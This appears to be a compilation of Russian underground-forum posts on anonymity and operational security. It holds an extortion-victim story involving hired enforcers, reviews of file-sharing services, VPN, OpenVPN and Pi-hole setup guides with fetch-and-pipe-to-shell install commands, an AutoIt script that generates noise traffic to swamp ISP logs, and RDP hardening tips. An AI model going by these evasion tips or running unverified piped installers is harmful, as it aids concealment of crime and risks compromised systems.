Успешно совмещая "трейдинг офис" с продажей материала в шопах, в один день стали жертвами вымогателя. Забегая на перед, отмечу что креативность этого Илон Маска (вымогателя) застала врасплох. Вначале про*** 5-ти значную сумму с одного из ПМ кошелей, через время получили предложение в жабу доплатить еще большую сумму, во избежание слива всей инфы о нас и наших объемах в контору.

Трезво поразмыслив, что в самом худшем варианте придется заносить еще больше $$ конторским, было принято решение потянуть время и поискать следы троя или утечки самим. Пока партнер с хостером проверяли серваки и логи, я тянул время общаясь с вымогателем.

На протяжении месяца общения в жабе, случайным образом была замечена закономерность: при появлении онлайн вымогателя, через ~10 сек. появлялся клиент нашего офиса, что натолкнуло на мысль что это может быть одно и тоже лицо. Так как личность клиента была известна, было решено нанять исполнителей возврата активов (так как через время удостоверелись на 90% что это наш клиент). Объяснив все подробно нанятым детям гор, они попросили больше доказательств, чем поставили в тупик. Их интеллект ставил под сомнение аргументы:
- разница входа онлайн двух жаб менее чем 10 сек.
- инфа об устройстве (get info в Pidgin'е) в обоих контактах выдавала Android3728...

Вспомнив студенческие года, была составлена и решена практическая задача по теории вероятности:

Предположим, что это два разных человека. Вход онлайн менее 10 сек, не более 60 сек. У двух жаб. Какая вероятность, что это два разных человека?

x = вымогатель
y = Олег А.

Событие А = 2 человека
Согласно геом вероятности

Тут мы получили вероятность того, что это 2 чел из 2х чел. Далее на основе примерных демографических данных:
Россия 140кк жителей
Укр 40кк
Белар. 35кк
Далее сделаем предположение, что наш вымогатель и клиент входят в ~10кк русскоговорящего населения пост СНГ.

По классической формуле вероятности

m - число благоприятных исходов
n - число всевозможных исходов

Сочетание n по k элементам

P - вероятность, что это два чел.

А вероятности, что при логине онлайн это два разных человека:

В итоге вероятность что это разные личности составила почти 0.

В конце все сложилось удачно для нас, даже получилось чуток заработать, но это совсем уже другая история.

Если понравилось - пишите коменты.

Всем удачи, и легала

Обмениваемся файлами, информацией анонимно (обзор сервисов)

ID: 676533bbb4103b69df371a61
Thread ID: 28692
Created: 2019-04-09T20:54:47+0000
Last Post: 2023-05-12T07:20:33+0000
Author: lukas
Replies: 20 Views: 3K

Сегодня будем обсуждать безопасную и анонимную передачу файлов. Задача с первого взгляда кажется простой и тривиальной, но это не так. Как решить данный вопрос – есть масса вариантов. Давайте сравним способы передачи файлов и сервисы, которые могут нам в этом помочь, сравним их функционал, плюсы/минусы и особое внимание уделим безопасности и анонимности.

1) «Mega» (http://mega.nz)
Сервис работает с 2013 года. Шифрует весь контент прямо в браузере с помощью алгоритма AES. Пользователи могут передавать друг другу файлы в зашифрованном виде, при этом все данные хранятся в «облаке». Ключи доступа к файлам не публикуются в открытом доступе, а распространяются по схеме Friend-to-Friend, между доверяющими друг другу пользователями.
В плане удобства – как минимум тебе нужно зарегистрироваться в данном сервисе, далее добавить человека в друзья и передать файл, либо сформировать ссылку на нужный файл и каким-то способом передать данную ссылку.
Вывод – безопасно и одновременно неудобно.

2) Передача файла через сервисы типа «SendSpace» и т.п.
(sendspace.com, dropmefiles.com, wikisend.com, 2share.su)
Как правило ты самостоятельно должен сформировать архив, для большей безопасности зашифровать его, залить на подобного рода сервис и далее каким-то образом передать ссылку и пароль на архив получателю. На многих сервисах присутствует функция удаления файла после скачивания, либо формирование ссылки для удаления файла – стоит обратить внимание на данные функции и при возможности использовать их. Один из дополнительных недостатков – указанные сервисы как правило пестрят рекламой и обвешаны разными «левыми» кнопками.
Вывод: неудобно, безопасность зависит от тебя самого и сервис в данном плане никак на нее не влияет.

Отдельно можно выделить сервис 2share.su. В отличие от аналогов, элементы рекламы в нем отсутствуют, в нем есть возможность создания архива и пароля к нему прямо на сайте. Кроме того на нем можно сохранить свои настройки, чтобы в дальнейшем к ним не возвращаться.

3) «Telegram» (telegram.org)
В плане безопасности все хорошо – end-to-end шифрование.
В плане удобства – тоже неплохо, просто кидаешь файлы своим контактам и готово.
В плане анонимности – далеко не идеальный вариант.
Для использования Telegram нужна регистрация, а это телефонный номер. При условии развития сервисов «пробива» аккаунтов Telegram данный вариант далеко не анонимен, как может показаться с 1 взгляда.

4) «SafeBox» (sfbox.org)
Данный сервис на рынке появился недавно. Позиционируется как сервис для безопасной и анонимной передачи файлов с помощью отдельной программы. Сервис позиционируется как анонимным, регистрация отсутствует полностью, достаточно скачать и установить приложение.
После установки приложения сервер выдает нам наш ID. Далее мы получаем у адресатов их ID и как во всех мессенджерах добавляем их себе в контакты. После этого можно начать обмен файлами. Чем то напоминает «Telegram». Сервис использует шифрование (PGP, RSA 2048).
Вывод – безопасно, анонимно, удобно. Сервис определенно заслуживает внимания.

5) «Skype» (skype.com)
Вас это может удивить, но да, им до сих пор пользуются.
Анонимность – тут не о чем говорить, для работы с сервисом необходима регистрация, а помимо нее телеметрия (это же Microsoft).
Шифрование – тут не все так плохо, шифрование присутствует.
Удобство – привычный интерфейс, все ясно и понятно, обмениваться файлами удобно.
ИТОГО – далеко не самый лучший выбор.

6) «Signal»
Топовый мессенджер в плане анонимности и безопасности. Мессенджер использует криптографический протокол ZRTP и алгоритм AES с длиной ключа 128 бит. Как в теории, так и на практике, данную защиту обойти практически нереально даже с помощью группы подготовленных людей с хорошим оборудованием. Есть версия и для IOS, и для Android.
В плане безопасности все хорошо.
Что по анонимности – мессенджер запрашивает вашу адресную книгу для определения с кем из контактов вы можете общаться, используя его. Для использования необходима регистрация по номеру телефона. Согласитесь – далеко не анонимно.
Вывод – безопасно, удобно, но не анонимно.

7) «Wickr»
Данный мессенджер возник так же, как и Signal после заявления об утечке данных АНБ. Дата основания 2013 год. В то время был вообще пик возникновения приложений с качественным шифрованием.
Разработчики Wickr с самого начала заявляли, что это самый защищенный мессенджер в мире, хотя код приложения закрытый и его нельзя потестить разным специалистам, как в случае с Signal. Wickr осуществляет закодированную передачу почти любой информации, включая фото, аудио, текст и видео. Оно не позволяет копировать или пересылать сообщения, или контент третьим лицам, и там тоже нельзя сделать скриншот. В приложении используются стандарты шифрования AES 256, ECDH 521, RSA 4096 TLD. Большой его плюс, что при регистрации вы придумываете уникальный ID и пароль. Регистрироваться через привязку телефонного номера не обязательно.
Отдельно хочется отметить интерфейс. Он сложнее, чем в Signal, но у этого есть логическое объяснение. У Wickr есть несколько пакетов (Wickr pro и Wickr ent), в том числе платные для организаций. Поэтому многие фирмы, особенно европейские, используют данный мессенджер как корпоративный.
«Wickr me» (обычная версия) бесплатный и реализован как для IOS, так и для Android. Недавно появилась русская версия и было убрано большое количество багов, которые присутствовали ранее.
Выводы: безопасно, анонимно. В плане удобства – есть замечания.

8) «Discord»
Это самый странный мессенджер из всей подборки. Дело в том, что «Discord» — это, прежде всего, «Voice chat» для геймеров. Изначально «Discord» предоставляет защиту от любой попытки DDoS игрока и предотвращает возможность узнать IP игрока. В общем если упростить, то с защитой у приложения все более- менее, в особенности с тем, что связано с голосовыми сообщениями и вообще аудио. Именно по этой причине я решил внести его в список. Здесь довольно специфический интерфейс, думаю не должно вас особо напрягать, так как изначально «Discord», все же, создавался для тех, кто играет в компьютерные игры. Для использования нужна регистрация. Разработчики заявляют что все передается по HTTPS а значит нам не о чем волноваться. Серьёзно? Разработчик плагина «DiscordCrypt» так не считает. Именно в нем реализовано шифрование e2e и при его использовании безопасность повышается в разы.
Выводы: интерфейс непривычен, но со временем довольно удобно пользоваться. Анонимность – повторюсь, для использования нужна регистрация. Безопасность – при использовании плагина «DiscordCrypt».

(с) sur777

Анонимность, безопасность TOX

ID: 676533bbb4103b69df371a8b
Thread ID: 75917
Created: 2022-11-15T05:56:49+0000
Last Post: 2023-01-12T02:58:54+0000
Author: IPMASHEEN
Replies: 42 Views: 3K

если человек не открывает снифф ссылки и не принимает файлы, а только общается текстом, возможно ли узнать его реальный ip?

VPN, настройка, конфигурации, мусорный трафик, итд.

ID: 676533bbb4103b69df371a8d
Thread ID: 68083
Created: 2022-06-03T13:11:19+0000
Last Post: 2022-12-27T08:06:04+0000
Author: Codla
Replies: 82 Views: 3K

К вопросу о надёжности впна. Все понимают, что уверенным можно быть только в собственном впне. Но от него нету толку, если ты пользуешься им один. Т.к. по запросу провайдеру будет видно, что на этот сервер приходит трафик с одного айпи и уходит туда же.
Вопрос - как добавить мусорного трафика? Чтоб на впн летело много пакетов с разных айпи. Давать его в арену не вариант, т.к. люди его использующие могут только добавить грязи. Плюс нужно помнить а тайминг анализе, т.е. пакеты должны лететь непрерывно и быть похожими на соседние Интересно ваше мнение.

[Вдруг не знал!] Как без лишних заморочек развернуть OpenVPN на SSH

ID: 676533bbb4103b69df371a91
Thread ID: 75369
Created: 2022-11-06T18:04:35+0000
Last Post: 2022-12-08T23:01:09+0000
Author: Bronx Wilde
Prefix: Статья
Replies: 10 Views: 3K

Почему это статья вообще здесь?
Статья написана для менее опытных, новоприбывших или давно искавших ответ на данный вопрос, каким я был не так давно. Спасибо !

Введение:
Стоит начать с того, что openvpn как и большинство vpn предоставляет несколько видов аутентификации: сертификат, логин пароль, либо и то и другое. Сильно углублять это не будем, так как поднимать и генерировать конфиг мы будем без сертов и паролей, а рассмотрим самый просто способ всего в пару команд, однако после прочтения прошу не знающий прочитать, зачем вообще нужен сертификат шифрования !

Процесс установки:
Приступим, под наши цели подойдут почти все SSH на которых установлен дистрибутив Linux. В моем примере рассмотрим один из самых популярных - Ubuntu.

Для начала обновим пакеты, чтобы избежать дальнейших ошибок:

Code:Copy to clipboard

sudo apt-get update
sudo apt-get upgrade

После завершения обновления, нам необходимо скачать .sh скрипт и запустить его. Сделать это можно прописав такую строку:

Code:Copy to clipboard

sudo wget https://git.io/vpn -O openvpn-install.sh && bash openvpn-install.sh

Настройка :
После исполнения команды выше видим такую картину

Здесь нам необходимо выбрать протокол которым будет пользоваться ovpn, чем они отличаются вы сможете прочитать в интернете, чаще всего лично я выбираю TCP протокол так-как у него есть повторная передача потерянных пакетов. Выбираем нужное подключение цифрой и ждем Enter.

Теперь нас просят выбрать порт, советую не выбирать стандартные порты, а использовать другие. Как пример используем порт 1731.

Выбираем DNS сервер, всегда берем 3.

Отлично ! Мы почти закончили, теперь обзываем наш конфиг как хотим, назовем его TEST.

Тут просто прожимаем Enter. И начнется генерация.

**Ваш конфиг готов !

Теперь его нужно забрать с сервера. **
Пропишем команду pwd чтобы узнать в какой директории мы находимся. Для верности можете прописать ls для просмотра файлов директории, чтобы убедиться, что конфиг на месте.

Теперь заберем наш конфиг с сервера. Будем использовать программу WinSCP. (программа для Windows, наиболее удачным аналогом для Linux считаю Krusader)
Устанавливаем программу, на ваш компьютер. Открываем, и используя подключение SFTP подключаемся к нашему серверу.

И видим наш конфиг:

Забираем его себе на ПК и пользуемся !
Мы настроили самый элементарный конфиг ovpn на SSH. Надеюсь кому-то эта статья была полезна так же, как и мне когда-то !

Параллельное использование впн

ID: 676533bbb4103b69df371acf
Thread ID: 69458
Created: 2022-06-30T15:02:39+0000
Last Post: 2022-08-22T21:51:01+0000
Author: Benihowy
Prefix: Статья
Replies: 21 Views: 3K

Всем доброго времени суток. При поиске бесплатного впн всегда сталкиваемся с некими проблемами: ограничение трафика, времени, скорости и т.д. Но все же хочется комфортно использовать впн для просмотра ютуба, вк, фейбука и прочего добра. Мне кажется, что такого бесплатного впна не существует. Из бесплатных, наверное, самый популярный это фриопенвпн (freeopenvpn.org). Это очень хороший впн, который можно проксифицировать, ведь он может работать по tcp. Этот впн имеет два ограничения – скорость и время работы (около 2мб\с и вводить пароль с каптчи раз в 10-12 часов). Вечерами скорость обычно просаживается до полумегабита. С этим ничего нельзя поделать, ну разве что купить премиум. И как-то пришла идея, а почему бы не запустить еще такой же впн и распределить нагрузку между ними, и тем самым расширить канал. Создадим виртуальные машины

Route I – receiver – принимает трафик от машин с впн
Vpn I nl, Vpn I uk, Vpn I usa – машины на которых запущены впн
Vpn I receiver – принимает трафик от ютуба, вк и прочего, затем распределяет его между впн.
Что же касается настройки, рассмотрим машины приема трафика от впн. Тут все просто, ccproxy и proxifier

На машинах с впн еще нужен файервол, для ограничения трафика, ведь ос windows будет стремится обновится, проверить активацию и т.д. Режим все кроме нужд впн, службы времени, прокси сервера. Еще важный момент, в конфиге впн-файла прописаны доменные имена, нам нужно изменить их на ip. Это сделаем для упрощения, чтобы не вводить днс сервер и не прописывать дополнительные правила для файерволов.

И рассмотрим машину, которая делит трафик между впнами. Разделение трафика происходит с помощью проксифайера, а именно создание прокси цепочки и присвоение ей атрибута load balancing

Почему не ставим файерволы на все машины, а только на некоторые? Да потому, что они там попросту не нужны, а только усложнят прописку правил. Так как машины находятся в изолированной внутренней сети, и не могут быть подвергнуты атакам из вне. Также на них отсутствует основной шлюз, что препятствует протеканию трафика «самоходом», ведь трафику попросту некуда идти, так как отсутствует направление. Такие машины имеют высокую степень безопасности и без файерволов

В отличии от машин на которых установлены впн клиенты, там необходим любой маршрут по умолчанию, для работы впна, например, поставим основной шлюз на nl машине на машину «route I – receiver». Трафик будет стучаться на машину, но зайдет в тупик и некому не навредит

В статье рассказано про три конфига - nl, uk, usa. Это не означает, что нельзя использовать один и тот же конфиг три или более раз. Конечно можно, тем самым будет легче вводить код авторизации один для всех, нежели для каждого отдельно. Но все же рекомендую использовать разные конфиги, так как нагрузка на сервера разная. Сегодня может еле-еле работать uk сервер, а завтра usa.

Генерация запросов

ID: 676533bbb4103b69df371aed
Thread ID: 56022
Created: 2021-08-30T08:33:27+0000
Last Post: 2022-07-25T14:56:00+0000
Author: Benihowy
Prefix: Статья
Replies: 21 Views: 3K

Говорят, если создать «шум» в сетевом трафике, то труднее будет отыскать впн или тор соединения. На что влияет этот «шум»? У провайдеров хранятся логи (по- разному, от 3 месяцев до 2 лет) и в автоматическом режиме они архивируются и скидываются в мусороприемник какого ни будь сервера. Допустим у провайдера 1000 клиентов и за целый день каждый сгенерирует около 1000 запросов. В итоге мы имеем миллион строк в текстовом файле (около 100МБ). На деле, и тех и этих может быть гораздо больше. Когда на этом сервере заканчивается место, очень часто удаляются самые старые файлы. Выходит, что чем больше мы запросов произведем, тем быстрее засорим жесткие диски сервера. Но мы не знаем объём хранилища. Да, возможно, провайдеры хранят их на облаках, но это единицы. Все остальные придерживаются правила – меньше вклад и больше прибыль.
На просторах интернета несколько генераторов трафика - web-traffic-generator, needl, noisy. Вот только они все написаны на питоне, и каким образом их запустить на windows не известно. Почему-то такого рода софт трудно найти, поэтому попытался своими силами что-то написать, используя скриптовый язык autoit

Hidden content for authorized users.

#include <array.au3>
#include <File.au3>
$file1 = FileOpen("word1.txt")
$file2 = FileOpen("word2.txt")
$file3 = FileOpen("word3.txt")
$file4 = FileOpen("word4.txt")
$answ = FileOpen("word_for_search.txt", 2)
Dim $word1[1]
Dim $word2[1]
Dim $word3[1]
Dim $word4[1]
$word1_count = _FileCountLines("word1.txt")
$word2_count = _FileCountLines("word2.txt")
$word3_count = _FileCountLines("word3.txt")
$word4_count = _FileCountLines("word4.txt")
For $i = 1 To $word1_count
_ArrayAdd($word1, FileReadLine($file1, $i))
Next
For $i = 1 To $word2_count
_ArrayAdd($word2, FileReadLine($file2, $i))
Next
For $i = 1 To $word3_count
_ArrayAdd($word3, FileReadLine($file3, $i))
Next
For $i = 1 To $word4_count
_ArrayAdd($word4, FileReadLine($file4, $i))
Next
$googles_domains = FileOpen("googles_domains.txt")
$googles_domains_count = _FileCountLines("googles_domains.txt")
Dim $googles_domains_array[1]
For $i = 1 To $googles_domains_count
_ArrayAdd($googles_domains_array, FileReadLine($googles_domains, $i))
Next
$string = StringSplit("1234567890_qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM", "")
HttpSetUserAgent("Mozilla/5.0 (Android 9; Tablet; rv:76.0) Gecko/76.0 Firefox/76.0 ")
$file = FileOpen("site.txt")
Dim $site[1]
For $i = 1 To _FileCountLines("site.txt")
_ArrayAdd($site, FileReadLine($file, $i))
Next
While True
Switch Random(1, 7, 1)
Case 1
antichat()
Case 2
xss()
Case 3
lost()
Case 4
rutracker()
Case 5
youtube()
Case 6
all_site()
Case 7
google_search()
EndSwitch
Sleep(10000)
WEnd
Func google_search()
$text1 = $word1[Random(1, $word1_count, 1)] & " " & $word2[Random(1, $word2_count, 1)] & " " & $word3[Random(1, $word3_count, 1)] & " в " & $word4[Random(1, $word4_count, 1)]
FileWriteLine($answ, $text1 & @CRLF)
InetRead($googles_domains_array[Random(1, $googles_domains_count, 1)] & "/search?q=" & $text1 & "&source=hp&sclient=gws-wiz", 2)
EndFunc ;==>google_search
Func antichat()
InetRead("https://forum.antichat.ru/threads/" & Random(1, 485000, 1) & "/", 2)
EndFunc ;==>antichat
Func xss()
InetRead("https://xss.is/threads/" & Random(1, 56000, 1) & "/", 2)
EndFunc ;==>xss
Func lost()
InetRead("https://www.lostfilm.tv/new/page_" & Random(1, 5000, 1) & "/", 2)
EndFunc ;==>lost
Func rutracker()
InetRead("https://rutracker.org/forum/viewtopic.php?t=" & Random(1, 6100000, 1), 2)
EndFunc ;==>rutracker
Func youtube()
$id=""
For $i = 1 To 11
$id &= $string[Random(1, 53, 1)]
Next
InetRead("https://youtube.com/watch?v=" & $id, 2)
EndFunc ;==>youtube
Func all_site()
InetRead("https://" & $site[Random(1, 500, 1)], 2)
EndFunc ;==>all_site

Click to expand...

Весь код не стану описывать, так как это может занять еще страниц 10, кто разбирается в программировании все быстро поймет. Опишу только основные моменты. Для примера, возьмем несколько форумов, youtube, google и пачку адресов сайтов. Всего вышло семь объектов, один из которых случайно запускается при повторении цикла.

Рассмотрим вкратце на примере lostfilm

InetRead("https://www.lostfilm.tv/new/page_" & Random(1, 5000, 1) & "/", 2)

Click to expand...

Эта строка создает запрос на страницу лостфильма, страница может быть случайная от 1 до 5000. Аналогично и для остальных форумов, только цифры другие.

Для youtube несколько сложнее. Чтобы сослаться на видео нужно ввести некий адрес из 11 символов, например, ютуби/watch?v=Dt9vh_eRTgd.

Деление посимвольно происходит в этой строке

$string = StringSplit("1234567890_qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM", "")

Click to expand...

потом идет сборка

For $i = 1 To 11
$id &= $string[Random(1, 53, 1)]
Next

Click to expand...

Вот и получается ссылка.

InetRead("https://youtube.com/watch?v=" & $id, 2)

Click to expand...

Кстати, видео по данной ссылке может и не существовать, но страница с рекомендациями других видео загрузится.

Имеется также список сайтов (около 500) , которые загружаются на своей главной странице

Теперь рассмотрим самое сложное – поиск в google. В скриптах питона, авторы использовали поиск лишь по одному слову. Что ж, попробуем взять целую фразу. Итак, начнем разбираться; имеются несколько файлов, которые строят «на лету» фразу для поиска. Для этого создадим 4 текстовых файла, в которых пропишем фразы

word1.txt – наименование товара

word2.txt – производитель

word3.txt – цель поиска

word4.txt – город

Приведу пример фразы сгенерированной для поиска – «Видеокарта Elitegroup продать в Таганрог». Ничего страшного, что такой видеокарты не существует, но google все равно выдаст ответ на этот запрос. Теперь по поводу построения кода
Подсчитывает количество строк в первом файле (аналогично для остальных)

$word1_count = _FileCountLines("word1.txt")

Click to expand...

Заполняем массив построчно из файла

For $i = 1 To $word1_count
_ArrayAdd($word1, FileReadLine($file1, $i))
Next

Click to expand...

Основная сборка случайных ячеек из 4х массивов

$text1 = $word1[Random(1, $word1_count, 1)] & " " & $word2[Random(1, $word2_count, 1)] & " " & $word3[Random(1, $word3_count, 1)] & " в " & $word4[Random(1, $word4_count, 1)]

Click to expand...

Так как у google есть очень много доменов (около 100) , то добавим их в новый файл

Случайно выбираем домен из ранее созданного массива

$googles_domains_array[Random(1, $googles_domains_count, 1)]

Click to expand...

Окончательная строка поиска будет выглядеть так

InetRead($googles_domains_array[Random(1, $googles_domains_count, 1)] & "/search?q=" & $text1 & "&source=hp&sclient=gws-wiz", 2)

Click to expand...

Кстати, во время поиска всплывают много переменных – source, ei, oq, gs_lcp, sclient их тоже можно генерировать случайным образом

В общем-то генерация пошла

В основном цикле установлена пауза в 10 секунд. Можно выставить свое значение и скомпилировать программу для запуска нескольких копий одновременно. Но все делается, разумеется, на свой страх и риск. Не известно, как поведет себя провайдер, да и хосты станут блокировать ваш ip.

Где лучше покупать VPS(VDS) для создание своего VPN?

ID: 676533bbb4103b69df371afb
Thread ID: 65180
Created: 2022-04-03T14:57:07+0000
Last Post: 2022-06-23T14:30:37+0000
Author: NeManeNot
Replies: 43 Views: 3K

Добрый день. Недавно задавался вот таким вот вопросом. Подскажите пожалуйста сервис и желательно ещё страну, где лучше всего будет поднять свой VPN.

Заранее всем спасибо за ответ

Поднимаем персональный OpenVPN

ID: 676533bbb4103b69df371b00
Thread ID: 68749
Created: 2022-06-16T01:19:53+0000
Last Post: 2022-06-16T12:18:47+0000
Author: achobem
Prefix: Статья
Replies: 20 Views: 3K

Заранее скажу, что это довольно безопасно и удобно
Приятного пользования!

-в данной статье я расскажу о поднятии своего VPN сервера
-обойдём блокировки и замедления сайтов
-заблокируем трекеры и рекламу на сайтах

По соображениям производительности или конфиденциальности, иногда хочется или необходимо заблокировать рекламу.
Один из вариантов - это использование различных расширений для браузеров, типа AdBlock.
Вариантов решения проблемы имеется огромное количество. Все упирается в количество устройств. Вам придётся устанавливать подобный софт на компьютер, планшет, телефон в индивидуальном порядке и проверять корректную работу

Лень - двигатель прогресса

Предлагаю установить и настроить сетевой фильтр из OpenVPN и Pi-hole для блокировки рекламы по DNS для всех устройств, подключённых к нашей сети.

Установим OpenVPN

wget https://git.io/vpn -O openvpn-install.sh
sudo bash openvpn-install.s

Настройка Pi-Hole

Судя по названию проекта, Pi-Hole зарезервирован не только для Raspberry Pi. Вы также можете запустить его на традиционном сервере, и мы собираемся этим заняться.

Обновите и установите новые пакеты:

sudo apt update -y &&
sudo apt upgrade -y

Установите curl :

sudo apt install curl

Далее все, что вам нужно, это выполнить эту простую команду:

curl -sSL https://install.pi-hole.net | bash

Когда вас спросят, хотите ли вы установить Pi-hole на свой сервер и поставить статический IP-адрес, отметьте «да».

В следующем окне – Choose An Interface – мастер предложит выбрать интерфейс, который будет прослушивать Pi-hole.

Чтобы использовать Pi-hole для мониторинга сетевого интерфейса VPN, используйте клавиши со стрелками на клавиатуре, чтобы выбрать tun0 , и нажмите пробел.

Затем нажмите TAB , чтобы перейти к параметрам в нижней части экрана.

Выбрав , нажмите Enter , чтобы сохранить настройки и продолжить.

Затем выберите предпочитаемый DNS. Потом его можно поменять или поставить несколько.

Вы можете выбрать блокировку объявлений (позже можно будет добавить свои списки).

Установщик также спросит вас, хотите ли вы поставить веб-панель , я настоятельно рекомендую вам ее к установке, чтобы вы могли из любой точки локальной сети подключиться к серверу с паролем и управлять своим DNS/черным списком и иметь статистику по трафику.

Откройте порт 53 и 80 для нашей подсети OpenVPN Если у вас установлен и работает FireWall UFW, то введите следующие команды:

ufw allow proto tcp from 10.8.0.0/24 to 10.8.0.1 port 80
ufw allow proto tcp from 10.8.0.0/24 to 10.8.0.1 port 53
ufw allow proto udp from 10.8.0.0/24 to 10.8.0.1 port 53

Если же ваш FireWall отключен, то вводить ничего дополнительно не нужно.

Чтобы веб-браузер работал правильно, откройте в брандмауэре порты для трафика HTTP и HTTPS:

sudo ufw allow http
sudo ufw allow https

Также нужно разрешить веб-трафику в диапазоне 10.8.0.0/24 проходить через VPN-сервер по адресу 10.8.0.1 и порту 80:

sudo ufw allow proto tcp from 10.8.0.0/24 to 10.8.0.1 port 80

Обновите конфигурацию OpenVPN, чтобы запустить наш сервер PI-hole dns

sudo vi /etc/openvpn/server.conf

Удалите или закомментируйте существующие записи DNS:

Stop using Google DNS for our OpenVPN
#push "dhcp-option DNS 8.8.8.8"
#push "dhcp-option DNS 8.8.4.4"
**
Затем добавьте наш IP-адрес PI-Hole DNS:**

push "dhcp-option DNS 10.8.0.1"

Перезапустите UFW:

sudo ufw reload

Если брандмауэр перезапустился успешно, вы увидите: Firewall reloaded

**Для нормальной работы веб-интерфейса выполним еще ряд операций:

Прежде всего установим владельца и новый набор прав на конфигурационные файлы и базы данных**, если этого не сделать, то веб-интерфейс будет работать только на чтение, а при попытке создать любой новый объект вы получите ошибку: Error, something went wrong! While executing: attempt to write a readonly database.

chown -R pihole:pihole /etc/pihole
chmod -R g+rw,u+rw /etc/pihole

Затем включим пользователя веб-сервера в группу pihole:

usermod -aG www-data pihole

На этом установку можно считать законченной.

Для обновления самого Pi-hole следует выполнить консольную команду:

pihole -up

Делать это можно даже из-под обычной учетной записи, в этом случае будет запрошен пароль sudo и повышение прав произойдет автоматически.

Настраиваем ваш домашний роутер без VPN, только через DNS.

Для большинства домашних роутеров справедливы следующие моменты:

У роутера можно задать кастомный DNS-сервер в настройках WAN-интерфейса, даже если IP-адрес получается от провайдера динамически.
Роутер выдает внутренним клиентам свой адрес в качестве DNS и переправляет их запросы на тот сервер, который указан в настройках WAN.

Соответственно, в этом случае нам необходимо и достаточно прописать адрес нашего Pi-Hole в качестве DNS-сервера в настройках WAN-интерфейса домашнего роутера.

Важно, чтобы он был единственным DNS-сервером в настройках, если будет указан какой-то еще — роутер будет балансировать запросы между ними по только ему известному принципу, и такая ситуация крайне неудобна для отладки проблем в сети.

Если вдруг что-то пошло не так и сервис перестал работать, указанную выше настройку достаточно поменять на адрес DNS-сервера вашего провайдера или, например, 8.8.8.8, а уже потом начинать разбираться.

RDP. Защита

ID: 676533bbb4103b69df371cdf
Thread ID: 37023
Created: 2020-05-04T10:07:39+0000
Last Post: 2020-05-06T18:03:00+0000
Author: Benihowy
Prefix: Статья
Replies: 15 Views: 3K

В связи с массовыми переходами на «удаленку» выросли и риски. Поэтому, стоит задуматься о мерах безопасности.

1. Меняем порт. Он прописан в реестре, и изменить нужно на какой-то из верхних (пусть будет 65123). Переходим в HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp и изменяем portnumber

2. Пароль. Он должен быть сложным и не иметь ассоциаций с пользователем и его окружением.
3. Открываем консоль gpedit.msc и переходим в «Конфигурация компьютера\Административные шаблоны\Компоненты Windows\Службы удаленных рабочих столов\Узел сеансов удаленных рабочих столов»

- в папке «подключение» много интересных параметров, рассмотрим некоторые из них:

«ограничение на количество подключений». Если к машине подключается определенное количество клиентов, то разумнее выставить этот параметр.
«выбор транспортных протоколов RDP». По умолчанию, rdp работает на udp протоколе, но его можно также использовать на tcp.

- В папке «безопасность» также обязательно должно быть включено «всегда запрашивать пароль при подключении»

- В папке «ограничение сеансов по времени» настраивается на усмотрение администратора

- Не стоит сохранять пароли от сервера на стороне клиента. К клиентскому компьютеру могут получить доступ, и через него к самому серверу. Поэтому выключаем сохранение паролей и обязуем пользователей вводить их каждый раз с помощью настройки «запрет сохранения паролей» и «запрашивать учетные данные на клиентском компьютере»

4. Добавим пользователя. Разумеется, для теста взят администратор

5. Файервол. А если конкретней, то грамотная его настройка. Необходимо разрешить подключение к нашему серверу только с определённых айпи адресов, а все остальные – запретить. В качестве примера рассмотрим outpost firewall. Приложение, которое будет принимать запросы из вне, это svchost.exe. Для него и напишем соответствующее правило. У меня в правиле стоит протокол tcp, потому что я использую rdp по tcp

54.38.59.195 – айпи адрес, с которого мы подключаемся к нашему серверу. Также нужно написать правило, запрещающее любой входящий трафик и поместить его в самый низ

Также стоит подумать о том, если файервол будет по какой-то причине отключен на сервере или к клиентской машине получит доступ злоумышленник. И возможно, он сможет подобрать пароль к серверу. Для такого случая нужно на сервере настроить политику безопасности блокировки учетной записи. Заходим в secpol.msc. Здесь можно выставить количество неудачных попыток входа и время блокировки учетной записи

После редактирование политик необходимо перезагрузить сервер. Теперь переходим на клиентскую машину и попробуем подключится к серверу

И у нас не получится это сделать, ведь этот сервер находится за NAT. Посмотрим, что скажет сайт спид-тестер

Заходим на роутер и пробрасываем порт. Из-за разновидности веб-интерфейса эта опция может выглядеть по-иному. Но она будет находится в разделе NAT

192.168.1.124 – айпи адрес виртуальной машины на которой и находится сервер с rdp. То есть, пакет придет на порт 65123 роутера, и сам роутер перенаправит его на 192.168.1.124:65123.
Перезагрузим роутер, чтобы изменения вступили в силу. Проверим еще раз сайт спид-тестера.

Теперь подключаемся к серверу. И если все сделали правильно, то увидим окно ввода логина/пароля к доступу на сервер. Еще интересной особенностью использования rdp по tcp, является перенаправление этого трафика на прокси. Даже через тор можно пропускать, только это влечёт за собой падение скорости и задержки.

Как вычисляют вирусописателей

ID: 676533bbb4103b69df371ce7
Thread ID: 31515
Created: 2019-09-03T10:04:30+0000
Last Post: 2020-04-13T17:31:07+0000
Author: prostaya1992
Prefix: Статья
Replies: 8 Views: 3K

Как вычисляют вирусописателей

Кто-то верит в домовых и полтергейст, кто-то — в снежного человека, кто-то — в то, что разработчик малвари и прочего нелегального софта может гарантировать собственную анонимность, просто накрыв бинарник упаковщиком или обфусцировав код. Отдельные индивидуумы убеждены, будто их деятельностью никогда не заинтересуются компетентные органы, если созданные ими программы не наносят прямого материального ущерба, не распространяются на территории России или пострадавшие не напишут в полицию толстую пачку заявлений. Трудно сказать, на чем именно основывается подобная самоуверенность, но лично мне наиболее вероятной причиной видится то, что таких вирмейкеров в недавнем прошлом слишком часто лупили по голове школьным портфелем.
Факты же упрямо демонстрируют нам совершенно иную картину. Деанон авторов малвари стал уже настолько привычным делом, что подобные инциденты в последнее время никого не удивляют. Ну спалили еще одного кодера, эка невидаль. Кое-кто и вовсе бравирует собственной неуязвимостью и безнаказанностью: дескать, вот он я, пусть попробуют поймать, да только кому я нужен? Нужен, мил человек, и еще как.

Да кому ты нужен?

